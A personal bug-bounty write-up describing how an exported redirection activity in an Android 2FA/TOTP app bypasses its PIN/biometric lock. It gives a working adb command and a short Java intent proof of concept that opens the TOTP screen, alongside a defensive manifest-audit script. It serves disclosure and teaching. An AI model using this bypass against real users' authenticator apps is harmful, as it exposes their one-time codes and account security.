A simple story about me
Learned about web application testing online during the COVID-19 period. Did testing on multiple web apps, but any bugs I reported were informational or duplicates. Then I was curious about Android app development, so I learned about developing apps. After that I was able to find security issues in Android apps. They are like low-hanging-fruit bugs.
Analyzing
I used an app for 2FA to get TOTP codes. Being a little curious about the app lock function, I decompiled the app using JADX-GUI (a tool to decompile the APK) and looked at the AndroidManifest.xml file to get the details of the app. [com.demo.app.HandleRedirectionActivity] is exported=true (meaning any app can call this activity), so I read the code of the activity; it doesn't have anything to read, it is just a redirection_handler activity. Jumped into the app lock [com.demo.app.PinLock]; while analyzing the code I got to know it doesn't validate the activity call.
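The manifest review above is the kind of check that can be scripted. The following Python script is an added example, not the author's code or the app's own: it parses an AndroidManifest.xml and lists every activity, service, receiver or provider that any other app can start, i.e. components that are exported (explicitly, or implicitly because they carry an intent-filter on targetSdk below 31) and are not gated by an android:permission. The manifest it runs on is constructed to mirror the description in the text; only the package name com.demo.app, HandleRedirectionActivity and PinLock come from the write-up, while TotpActivity, MainActivity and AdminActivity are hypothetical names used to show the other cases the rule has to handle.

```python
"""Audit an AndroidManifest.xml for components that any other app may start.

Added example for this write-up (not the author's code). The sample manifest below is
constructed to mirror the text: package com.demo.app with an exported
HandleRedirectionActivity and a non-exported PinLock. TotpActivity, MainActivity and
AdminActivity are hypothetical, added to exercise the implicit, launcher and
permission-protected cases.
"""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")

# Constructed sample manifest (decompiled manifests from jadx look like this).
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.demo.app">
  <application>
    <activity android:name="com.demo.app.HandleRedirectionActivity" android:exported="true"/>
    <activity android:name=".PinLock" android:exported="false"/>
    <activity android:name=".TotpActivity">
      <intent-filter><action android:name="android.intent.action.VIEW"/></intent-filter>
    </activity>
    <activity android:name=".MainActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".AdminActivity" android:exported="true"
              android:permission="com.demo.app.ADMIN"/>
  </application>
</manifest>
"""


def attr(elem, name):
    """Read an android:-namespaced attribute, or None if it is absent."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def qualify(name, package):
    """Expand the shorthand '.Foo' or 'Foo' form to 'com.pkg.Foo'."""
    if name.startswith("."):
        return package + name
    if "." not in name:
        return package + "." + name
    return name


def is_launcher(elem):
    """True for the MAIN/LAUNCHER activity, which is expected to be exported."""
    for f in elem.findall("intent-filter"):
        actions = {attr(a, "name") for a in f.findall("action")}
        cats = {attr(c, "name") for c in f.findall("category")}
        if "android.intent.action.MAIN" in actions and "android.intent.category.LAUNCHER" in cats:
            return True
    return False


def exported_state(elem):
    """Return (exported, reason) following the platform rule: an explicit android:exported
    wins; otherwise a component with an <intent-filter> defaults to exported on
    targetSdk < 31 (Android 12 rejects manifests that leave it implicit), and a component
    without one defaults to private. targetSdk normally lives in build.gradle, so it is not
    read here; the implicit case is flagged so a reviewer can confirm it."""
    explicit = attr(elem, "exported")
    if explicit is not None:
        return explicit.lower() == "true", 'explicit android:exported="%s"' % explicit
    if elem.find("intent-filter") is not None:
        return True, "implicit: has <intent-filter> and no android:exported"
    return False, "implicit: no <intent-filter>"


def audit_manifest(xml_text):
    """Return a list of {type, name, reason} for components reachable from any other app."""
    root = ET.fromstring(xml_text)
    package = root.get("package", "")
    findings = []
    app = root.find("application")
    if app is None:
        return findings
    for tag in COMPONENT_TAGS:
        for comp in app.findall(tag):
            exported, reason = exported_state(comp)
            if not exported:
                continue
            # A caller must hold the declared permission, so the component is not open to all.
            gated = attr(comp, "permission")
            if tag == "provider":
                gated = gated or attr(comp, "readPermission") or attr(comp, "writePermission")
            if gated:
                continue
            if tag in ("activity", "activity-alias") and is_launcher(comp):
                continue
            findings.append({"type": tag, "name": qualify(attr(comp, "name"), package), "reason": reason})
    return findings


if __name__ == "__main__":
    for f in audit_manifest(SAMPLE_MANIFEST):
        print("%-9s %-45s %s" % (f["type"], f["name"], f["reason"]))
```

Run against the sample it reports HandleRedirectionActivity (explicitly exported, no permission) and TotpActivity (implicitly exported through its intent-filter), while PinLock (exported=false), MainActivity (launcher) and AdminActivity (permission-gated) are left out. Each reported activity then needs the second check the write-up describes: reading its code to see whether it enforces the app lock itself rather than assuming it was reached through a locked screen.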
Exploiting
Then I called the redirection activity directly using ADB. Haa!! The app lock activity doesn't authenticate the redirection_handler activity.
$ adb shell am start -n com.demo.app/.HandleRedirectionActivity
Creating POC
Most VDP programs don't allow the use of ADB, so I created an Android application in Android Studio.
import android.content.Intent;

// Explicit intent naming the target package and the exported activity class.
Intent intent = new Intent();
intent.setClassName("com.demo.app", "com.demo.app.HandleRedirectionActivity");
startActivity(intent);
Just create an app that calls the redirection_handler activity; when you open the attacker app, it bypasses the biometric check and enters the TOTP activity.
LinkedIn profile: Barath Stalin